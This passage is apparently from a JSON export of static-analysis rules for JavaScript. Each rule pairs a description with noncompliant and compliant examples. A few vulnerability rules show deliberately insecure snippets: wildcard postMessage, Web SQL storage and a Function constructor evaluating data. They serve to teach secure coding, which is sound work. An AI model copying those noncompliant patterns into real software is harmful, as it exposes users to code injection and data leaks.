(perhaps\ncounter-intuitively) to compare it to itself. 
Since <code>NaN !== NaN<\/code>, when <code>a !== a<\/code>, you know it must equal <code>NaN<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar a = NaN;\n\nif (a === NaN) {  \/\/ Noncompliant; always false\n  console.log(\"a is not a number\");  \/\/ this is dead code\n}\nif (a !== NaN) { \/\/ Noncompliant; always true\n  console.log(\"a is not NaN\"); \/\/ this statement is not necessarily true\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (Number.isNaN(a)) {\n  console.log(\"a is not a number\");\n}\nif (!Number.isNaN(a)) {\n  console.log(\"a is not NaN\");\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/7AEqAQ\">CERT, NUM07-J.<\/a> - Do not attempt comparisons with NaN <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2692","repo":"javascript","name":"\"indexOf\" checks should not be for positive numbers","htmlDesc":"<p>Most checks against an <code>indexOf<\/code> call against a string or array compare it with -1 because 0 is a valid index. 
Any checks which look for\nvalues &gt; 0 ignore the first element, which is likely a bug.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar color = \"blue\";\nvar name = \"ishmael\";\nvar number = 123;\n\nvar arr = [color, name];\n\nif (arr.indexOf(\"blue\") &gt; 0) { \/\/ Noncompliant\n  \/\/ ...\n}\nif (arr[0].indexOf(\"ish\") &gt; 0) { \/\/ Noncompliant\n  \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar color = \"blue\";\nvar name = \"ishmael\";\nvar number = 123;\n\nvar arr = [color, name];\n\nif (arr.indexOf(\"blue\") &gt;= 0) {\n  \/\/ ...\n}\nif (arr[0].indexOf(\"ish\") &gt; -1) {\n  \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2714","repo":"javascript","name":"Element type selectors should not be used with class selectors","htmlDesc":"<p>Using element type in class selectors is slower than using only the class selector.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar $products = $(\"div.products\");    \/\/ Noncompliant - slow\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar $products = $(\".products\");    \/\/ Compliant - fast\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2715","repo":"javascript","name":"\"find\" should be used to select the children of an element known by id","htmlDesc":"<p>The use of <code>find<\/code> allows <code>document.getElementById()<\/code> to be used for the top-level selection, and saves the jQuery Sizzle\nengine for where it's really needed. 
That makes the query faster, and your application more responsive.<\/p>\n<p>From the jQuery documentation:<\/p>\n<blockquote>\n  <p>Beginning your selector with an ID is always best.<\/p>\n  <p>The <code>.find()<\/code> approach is faster because the first selection is handled without going through the Sizzle selector engine \u2013 ID-only\n  selections are handled using <code>document.getElementById()<\/code>, which is extremely fast because it is native to the browser.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar $productIds = $(\"#products div.id\"); \/\/ Noncompliant - a nested query for Sizzle selector engine\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar $productIds = $(\"#products\").find(\"div.id\"); \/\/ Compliant - #products is already selected by document.getElementById() so only div.id needs to go through Sizzle selector engine\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2757","repo":"javascript","name":"\"=+\" should not be used instead of \"+=\"","htmlDesc":"<p>The use of operators pairs (<code>=+<\/code> or <code>=-<\/code>) where the reversed, single operator was meant (<code>+=<\/code> or <code>-=<\/code>)\nwill compile and run, but not produce the expected results.<\/p>\n<p>This rule raises an issue when <code>=+<\/code> and <code>=-<\/code> are used without any space between the two operators and when there is at least\none whitespace after.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar target =-5;\nvar num = 3;\n\ntarget =- num;  \/\/ Noncompliant; target = -3. 
Is that really what's meant?\ntarget =+ num; \/\/ Noncompliant; target = 3\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar target = -5;\nvar num = 3;\n\ntarget = -num;  \/\/ Compliant; intent to assign inverse value of num is clear\ntarget += num;\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2770","repo":"javascript","name":"Deprecated jQuery methods should not be used","htmlDesc":"<p>Deprecation is a warning that a method has been superseded, and will eventually be removed. The deprecation period allows you to make a smooth\ntransition away from the aging, soon-to-be-retired technology.<\/p>\n<p>This rule raises an issue when any of the following methods is used:<\/p>\n<ul>\n  <li> <code>.andSelf()<\/code> <\/li>\n  <li> <code>.context<\/code> <\/li>\n  <li> <code>.die()<\/code> <\/li>\n  <li> <code>.error()<\/code> <\/li>\n  <li> <code>jQuery.boxModel<\/code> <\/li>\n  <li> <code>jQuery.browser<\/code> <\/li>\n  <li> <code>jQuery.sub()<\/code> <\/li>\n  <li> <code>jQuery.support<\/code> <\/li>\n  <li> <code>.live()<\/code> <\/li>\n  <li> <code>.load()<\/code> <\/li>\n  <li> <code>.selector<\/code> <\/li>\n  <li> <code>.size()<\/code> <\/li>\n  <li> <code>.toggle()<\/code> <\/li>\n  <li> <code>.unload()<\/code> <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2817","repo":"javascript","name":"Web SQL databases should not be used","htmlDesc":"<p>The Web SQL Database standard never saw the light of day. It was first formulated, then deprecated by the W3C and was only implemented in some\nbrowsers. 
(It is not supported in Firefox or IE.)<\/p>\n<p>Further, the use of a Web SQL Database poses security concerns, since you only need its name to access such a database.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar db = window.openDatabase(\"myDb\", \"1.0\", \"Personal secrets stored here\", 2*1024*1024);  \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A6-Sensitive_Data_Exposure\">OWASP Top Ten 2013 Category A6<\/a> - Sensitive Data Exposure\n  <\/li>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities\">OWASP Top Ten 2013 Category A9<\/a> - Using\n  Components with Known Vulnerabilities <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S2819","repo":"javascript","name":"Cross-document messaging domains should be carefully restricted","htmlDesc":"<p>HTML5 adds the ability to send messages to documents served from other domains. 
According to the specification:<\/p>\n<blockquote>\n  Authors should not use the wildcard keyword (\n  <code>*<\/code>) in the\n  <code>targetOrigin<\/code> argument in messages that contain any confidential information, as otherwise there is no way to guarantee that the message\n  is only delivered to the recipient to which it was intended.\n<\/blockquote>\n<p>To mitigate the risk of sending sensitive information to a document served from a hostile or unknown domain, this rule raises an issue each time\n<code>Window.postMessage<\/code> is used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar myWindow = document.getElementById('myIFrame').contentWindow;\nmyWindow.postMessage(message, \"*\"); \/\/ Noncompliant; how do you know what you loaded in 'myIFrame' is still there?\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A3-Cross-Site_Scripting_(XSS)\">OWASP Top Ten 2013 Category A3<\/a> - Cross-Site Scripting\n  (XSS) <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S2870","repo":"javascript","name":"\"delete\" should not be used on arrays","htmlDesc":"<p>The <code>delete<\/code> operator can be used to remove a property from any object. Arrays are objects, so the <code>delete<\/code> operator can be\nused here too, but if it is, a hole will be left in the array because the indexes\/keys won't be shifted to reflect the deletion. 
<\/p>\n<p>The proper method for removing an element at a certain index would be:<\/p>\n<ul>\n  <li> <code>Array.prototype.splice<\/code> - add\/remove elements from the array <\/li>\n  <li> <code>Array.prototype.pop<\/code> - add\/remove elements from the end of the array <\/li>\n  <li> <code>Array.prototype.shift<\/code> - add\/remove elements from the beginning of the array <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar myArray = ['a', 'b', 'c', 'd'];\n\ndelete myArray[2];  \/\/ Noncompliant. myArray =&gt; ['a', 'b', undefined, 'd']\nconsole.log(myArray[2]); \/\/ expected value was 'd' but output is undefined\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar myArray = ['a', 'b', 'c', 'd'];\n\n\/\/ removes 1 element from index 2\nremoved = myArray.splice(2, 1);  \/\/ myArray =&gt; ['a', 'b', 'd']\nconsole.log(myArray[2]); \/\/ outputs 'd'\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2873","repo":"javascript","name":"Calls should not be made to non-callable values","htmlDesc":"<p>The fact that JavaScript is not a strongly typed language allows developers a lot of freedom, but that freedom can be dangerous if you go too far\nwith it. <\/p>\n<p>Specifically, it is syntactically acceptable to invoke any expression as though its value were a function. 
But a <code>TypeError<\/code> may be\nraised if you do.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfoo = 1;\nfoo();   \/\/ Noncompliant; TypeError\n\nfoo = undefined;\nfoo();  \/\/ Noncompliant; TypeError\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2898","repo":"javascript","name":"\"[type=...]\" should be used to select elements by type","htmlDesc":"<p>While <code>:&lt;element_type&gt;<\/code> and <code>[type=\"&lt;element_type&gt;\"]<\/code> can both be used in jQuery to select elements by their\ntype, <code>[type=\"&lt;element_type&gt;\"]<\/code> is far faster because it can take advantage of the native DOM <code>querySelectorAll()<\/code> method\nin modern browsers. <\/p>\n<p>This rule raises an issue when the following selectors are used:<\/p>\n<ul>\n  <li> <code>:checkbox<\/code> <\/li>\n  <li> <code>:file<\/code> <\/li>\n  <li> <code>:image<\/code> <\/li>\n  <li> <code>:password<\/code> <\/li>\n  <li> <code>:radio<\/code> <\/li>\n  <li> <code>:reset<\/code> <\/li>\n  <li> <code>:text<\/code> <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar input = $( \"form input:radio\" ); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar input = $( \"form input[type=radio]\" ); \/\/ Compliant\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2990","repo":"javascript","name":"The global \"this\" object should not be used","htmlDesc":"<p>When the keyword <code>this<\/code> is used outside of an object, it refers to the global <code>this<\/code> object, which is the same thing as the\n<code>window<\/code> object in a standard web page. This could be confusing to maintainers. 
Instead, simply drop the <code>this<\/code>, or replace it\nwith <code>window<\/code>; it will have the same effect and be more readable.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nthis.foo = 1;   \/\/ Noncompliant\nconsole.log(this.foo); \/\/ Noncompliant\n\nfunction MyObj() {\n  this.foo = 1; \/\/ Compliant\n}\n\nMyObj.func1 = function() {\n  if (this.foo == 1) { \/\/ Compliant\n    \/\/ ...\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfoo = 1;\nconsole.log(foo);\n\nfunction MyObj() {\n  this.foo = 1;\n}\n\nMyObj.func1 = function() {\n  if (this.foo == 1) {\n    \/\/ ...\n  }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2999","repo":"javascript","name":"\"new\" operators should be used with functions","htmlDesc":"<p>The <code>new<\/code> keyword should only be used with objects that define a constructor function. Use it with anything else, and you'll get a\n<code>TypeError<\/code> because there won't be a constructor function for the <code>new<\/code> keyword to invoke.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction MyClass() {\n  this.foo = 'bar';\n}\n\nvar someClass = 1;\n\nvar obj1 = new someClass;    \/\/ Noncompliant;\nvar obj2 = new MyClass();    \/\/ Noncompliant if considerJSDoc parameter set to true. 
Compliant when considerJSDoc=false\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/**\n * @constructor\n *\/\nfunction MyClass() {\n  this.foo = 'bar';\n}\n\nvar someClass = function(){\n  this.prop = 1;\n}\n\nvar obj1 = new someClass;  \/\/ Compliant\nvar obj2 = new MyClass();  \/\/ Compliant regardless of considerJSDoc value\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[{"key":"considerJSDoc","htmlDesc":"Consider only functions with @constructor tag as constructor functions","defaultValue":"false","type":"BOOLEAN"}],"type":"BUG"},{"key":"javascript:S3001","repo":"javascript","name":"\"delete\" should be used only with object properties","htmlDesc":"<p>The semantics of the <code>delete<\/code> operator are a bit tricky, and it can only be reliably used to remove properties from objects. Pass\nanything else to it, and you may or may not get the desired result.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x  = 1;\ndelete x;       \/\/ Noncompliant\n\nfunction foo(){\n..\n}\n\ndelete foo;  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar obj = {\n  x:1,\n  foo: function(){\n  ...\n  }\n};\ndelete obj.x;\ndelete obj.foo;\n\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3358","repo":"javascript","name":"Ternary operators should not be nested","htmlDesc":"<p>Just because you <em>can<\/em> do something, doesn't mean you should, and that's the case with nested ternary operations. Nesting ternary operators\nresults in the kind of code that may seem clear as day when you write it, but six months later will leave maintainers (or worse - future you)\nscratching their heads and cursing.<\/p>\n<p>Instead, err on the side of clarity, and use another line to express the nested operation as a separate statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic String getTitle(Person p) {\n\n  return p.gender==Person.MALE?\"Mr. 
\":p.isMarried()?\"Mrs. \":\"Miss \" + p.getLastName();  \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\n  String honorific = p.isMarried()?\"Mrs. \":\"Miss \";\n  return p.gender==Person.MALE?\"Mr. \": honorific + p.getLastName();\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3500","repo":"javascript","name":"Attempts should not be made to update \"const\" variables","htmlDesc":"<p>Variables declared with <code>const<\/code> cannot be modified. Unfortunately, attempts to do so don't always raise an error; in a non-ES2015\nenvironment, such an attempt might simply be ignored.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconst pi = \"yes, please\";\npi = 3.14;  \/\/ Noncompliant\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3509","repo":"javascript","name":"Default parameters should not cause side effects","htmlDesc":"<p>The assignment of default parameter values is generally intended to help the caller. But when a default assignment causes side effects, the caller\nmay not be aware of the extra changes or may not fully understand their implications. I.e. default assignments with side effects may end up hurting\nthe caller, and for that reason, they should be avoided.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar count = 0;\n\nfunction go(i = count++) {  \/\/ Noncompliant\n  console.log(i);\n}\n\ngo();  \/\/ outputs 0\ngo(7); \/\/ outputs 7\ngo();  \/\/ outputs 1\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3513","repo":"javascript","name":"\"arguments\" should not be accessed directly","htmlDesc":"<p>The magic of JavaScript is that you can pass arguments to functions that don't declare parameters, and on the other side, you can use those\npassed-in arguments inside the no-args <code>function<\/code>. 
<\/p>\n<p>But just because you can, that doesn't mean you should. The expectation and use of arguments inside functions that don't explicitly declare them is\nconfusing to callers. No one should ever have to read and fully understand a function to be able to use it competently. <\/p>\n<p>If you don't want to name arguments explicitly, use the <code>...<\/code> syntax to specify that a variable number of arguments is expected. Then\ninside the function, you'll be dealing with a first-class array, rather than an array-like structure.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction concatenate() {\n  let args = Array.prototype.slice.call(arguments);  \/\/ Noncompliant\n  return args.join(', ');\n}\n\nfunction doSomething(isTrue) {\n  var args = Array.prototype.slice.call(arguments, 1); \/\/ Noncompliant\n  if (!isTrue) {\n    for (var arg of args) {\n      ...\n    }\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction concatenate(...args) {\n  return args.join(', ');\n}\n\nfunction doSomething(isTrue, ...values) {\n  if (!isTrue) {\n    for (var value of values) {\n      ...\n    }\n  }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3514","repo":"javascript","name":"Destructuring syntax should be used for assignments","htmlDesc":"<p>ECMAScript 2015 introduced the ability to extract and assign multiple data points from an object or array simultaneously. This is called\n\"destructuring\", and it allows you to condense boilerplate code so you can concentrate on logic. 
<\/p>\n<p>This rule raises an issue when multiple pieces of data are extracted out of the same object or array and assigned to variables.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo (obj1, obj2, array) {\n  var a = obj1.a;  \/\/ Noncompliant\n  var b = obj1.b;\n\n  var name = obj2.name;  \/\/ ignored; there's only one extraction-and-assignment\n\n  var zero = array[0];  \/\/ Noncompliant\n  var one = array[1];\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction foo (obj1, obj2, array) {\n  var {a, b} = obj1;\n\n  var {name} = obj2;  \/\/ this syntax works because var name and property name are the same\n\n  var [zero, one] = array;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3516","repo":"javascript","name":"Function returns should not be invariant","htmlDesc":"<p>When a function is designed to return an invariant value, it may be poor design, but it shouldn't adversely affect the outcome of your program.\nHowever, when it happens on all paths through the logic, it is likely a mistake.<\/p>\n<p>This rule raises an issue when a function contains several <code>return<\/code> statements that all return the same value.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo(a) {  \/\/ Noncompliant\n  let b = 12;\n  if (a) {\n    return b;\n  }\n  return b;\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3523","repo":"javascript","name":"Function constructors should not be used","htmlDesc":"<p>In addition to being obtuse from a syntax perspective, function constructors are also dangerous: their execution evaluates the constructor's string\narguments similar to the way <code>eval<\/code> works, which could expose your program to random, unintended code which can be both slow and a security\nrisk.<\/p>\n<p>In general it is better to avoid it altogether, particularly when used to parse 
JSON data. You should use ECMAScript 5's built-in JSON functions or\na dedicated library.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar obj =  new Function(\"return \" + data)();  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar obj = JSON.parse(data);\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Function calls where the argument is a string literal (e.g. <code>(Function('return this'))()<\/code>) are ignored. <\/p>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S3524","repo":"javascript","name":"Braces and parentheses should be used consistently with arrow functions","htmlDesc":"<p>Shared coding conventions allow teams to collaborate effectively. This rule raises an issue when the use of parentheses with an arrow function does\nnot conform to the configured requirements.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the configured defaults forbidding parentheses<\/p>\n<pre>\nvar foo = (a) =&gt; { \/* ... *\/ };  \/\/ Noncompliant; remove parens from arg\nvar bar = (a, b) =&gt; { return 0; };  \/\/ Noncompliant; remove curly braces from body\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar foo = a =&gt; { \/* ... *\/ };\nvar bar = (a, b) =&gt; 0;\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[{"key":"body_braces","htmlDesc":"True to require curly braces around function body. False to forbid them for single-return bodies.","defaultValue":"false","type":"BOOLEAN"},{"key":"parameter_parens","htmlDesc":"True to require parentheses around parameters. 
False to forbid them for single parameter.","defaultValue":"false","type":"BOOLEAN"}],"type":"CODE_SMELL"},{"key":"javascript:S3525","repo":"javascript","name":"Class methods should be used instead of \"prototype\" assignments","htmlDesc":"<p>Originally JavaScript didn't support <code>class<\/code>es, and class-like behavior had to be kludged using things like <code>prototype<\/code>\nassignments for \"class\" functions. Fortunately, ECMAScript 2015 added classes, so any lingering <code>prototype<\/code> uses should be converted to\ntrue <code>class<\/code>es. The new syntax is more expressive and clearer, especially to those with experience in other languages.<\/p>\n<p>Specifically, with ES2015, you should simply declare a <code>class<\/code> and define its methods inside the class declaration.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction MyNonClass(initializerArgs = []) {\n  this._values = [...initializerArgs];\n}\n\nMyNonClass.prototype.doSomething = function () {  \/\/ Noncompliant\n  \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {\n  constructor(initializerArgs = []) {\n    this._values = [...initializerArgs];\n  }\n\n  doSomething() {\n    \/\/...\n  }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3533","repo":"javascript","name":"\"import\" should be used to include external code","htmlDesc":"<p>Before ECMAScript 2015, module management had to be ad-hoc or provided by 3rd-party libraries such as Node.js, Webpack, or RequireJS. 
Fortunately,\nES2015, provides language-standard mechanisms for module management, <code>import<\/code> and <code>export<\/code>, and older usages should be\nconverted.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n\/\/ circle.js\nexports.area = function (r) {\n  return PI * r * r;\n};\n\n\/\/ foo.js\ndefine([\".\/cart\", \".\/horse\"], function(cart, horse) {  \/\/ Noncompliant\n  \/\/ ...\n});\n\n\/\/ bar.js\nconst circle = require('.\/circle.js');  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/\/ circle.js\nlet area = function (r) {\n  return PI * r * r;\n}\nexport default area;\n\n\/\/ foo.js\nimport cart from \".\/cart.js\";\nimport horse from \".\/horse.js\";\n\n\/\/ bar.js\nimport circle from \".\/circle.js\"\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3579","repo":"javascript","name":"Array indexes should be numeric","htmlDesc":"<p>JavaScript is flexible enough to allow you to store values in an array with either numeric or named indexes. That is, it supports associative\narrays. But creating and populating an object in JavaScript is just as easy as an array, and more reliable if you need named members.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nlet arr = [];\narr[0] = 'a';\narr['name'] = 'bob';  \/\/ Noncompliant\narr[1] = 'foo';\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nlet obj = {\n  name: 'bob',\n  arr: ['a', 'foo']\n};\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3616","repo":"javascript","name":"Comma and logical OR operators should not be used in switch cases","htmlDesc":"<p>The comma operator (<code>,<\/code>) evaluates its operands, from left to right, and returns the second one. That's useful in some situations, but\njust wrong in a <code>switch<\/code> <code>case<\/code>. 
You may think you're compactly handling multiple values in the case, but only the last one in\nthe comma-list will ever be handled. The rest will fall through to the default.<\/p>\n<p>Similarly the logical OR operator (<code>||<\/code>) will not work in a <code>switch<\/code> <code>case<\/code>, only the first argument will be\nconsidered at execution time.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch a {\n  case 1,2:  \/\/ Noncompliant; only 2 is ever handled by this case\n    doTheThing(a);\n  case 3 || 4: \/\/ Noncompliant; only '3' is handled\n    doThatThing(a);\n  case 5:\n    doTheOtherThing(a);\n  default:\n    console.log(\"Neener, neener!\");  \/\/ this happens when a==1 or a == 4\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch a {\n  case 1:\n  case 2:\n    doTheThing(a);\n  case 3:\n  case 4:\n    doThatThing(a);\n  case 5:\n    doTheOtherThing(a);\n  default:\n    console.log(\"Neener, neener!\");\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3686","repo":"javascript","name":"Functions should not be called both with and without \"new\"","htmlDesc":"<p>Constructor functions, which create new object instances, must only be called with <code>new<\/code>. Non-constructor functions must not. Mixing\nthese two usages could lead to unexpected results at runtime.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction getNum() {\n  return 5;\n}\n\nfunction Num(numeric, alphabetic) {\n  this.numeric = numeric;\n  this.alphabetic = alphabetic;\n}\n\nvar myFirstNum = getNum();\nvar my2ndNum = new getNum();  \/\/ Noncompliant. An empty object is returned, NOT 5\n\nvar myNumObj1 = new Num();\nvar myNumObj2 = Num();  \/\/ Noncompliant. 
undefined is returned, NOT an object\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3699","repo":"javascript","name":"The output of functions that don't return anything should not be used","htmlDesc":"<p>If a function does not return anything, it makes no sense to use its output. Specifically, passing it to another function, or assigning its\n\"result\" to a variable is probably a bug because such functions return <code>undefined<\/code>, which is probably not what was intended.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo() {\n}\n\na = foo();\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction foo() {\n}\n\nfoo();\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3735","repo":"javascript","name":"\"void\" should not be used","htmlDesc":"<p>The <code>void<\/code> operator evaluates its argument and unconditionally returns <code>undefined<\/code>. It can be useful in pre-ECMAScript 5\nenvironments, where <code>undefined<\/code> could be reassigned, but generally, its use makes code harder to understand.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvoid (function() {\n   ...\n}());\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n(function() {\n   ...\n}());\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>No issue is raised when <code>void 0<\/code> is used in place of <code>undefined<\/code>. <\/p>\n<pre>\nif (parameter === void 0) {...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3758","repo":"javascript","name":"Values not convertible to numbers should not be used in numeric comparisons","htmlDesc":"<p>In a Zen-like manner, <code>NaN<\/code> isn't equal to anything, even itself. So comparisons (<code>&gt;, &lt;, &gt;=, &lt;=<\/code>) where one\noperand is <code>NaN<\/code> or evaluates to <code>NaN<\/code> always return <code>false<\/code>. 
Specifically, <code>undefined<\/code> and objects that\ncannot be converted to numbers evaluate to <code>NaN<\/code> when used in numerical comparisons.<\/p>\n<p>This rule raises an issue when there is at least one path through the code where one of the operands to a comparison is <code>NaN<\/code>,\n<code>undefined<\/code> or an <code>Object<\/code> which cannot be converted to a number.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x;  \/\/ x is currently \"undefined\"\nif (someCondition()) {\n  x = 42;\n}\n\nif (42 &gt; x) {  \/\/ Noncompliant; \"x\" might still be \"undefined\"\n  doSomething();\n}\n\nvar obj = {prop: 42};\nif (obj &gt; 24) { \/\/ Noncompliant\n  doSomething();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar x;\nif (someCondition()) {\n  x = 42;\n} else {\n  x = foo();\n}\n\nif (42 &gt; x) {\n  doSomething();\n}\n\nvar obj = {prop: 42};\nif (obj.prop &gt; 24) {\n  doSomething();\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3776","repo":"javascript","name":"Cognitive Complexity of functions should not be too high","htmlDesc":"<p>Cognitive Complexity is a measure of how hard the control flow of a function is to understand. Functions with high Cognitive Complexity will be\ndifficult to maintain.<\/p>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/redirect.sonarsource.com\/doc\/cognitive-complexity.html\">Cognitive Complexity<\/a> <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[{"key":"threshold","htmlDesc":"The maximum authorized complexity.","defaultValue":"15","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:S3782","repo":"javascript","name":"Arguments to built-in functions should match documented types","htmlDesc":"<p>The types of the arguments to built-in functions are specified in the JavaScript language specifications. 
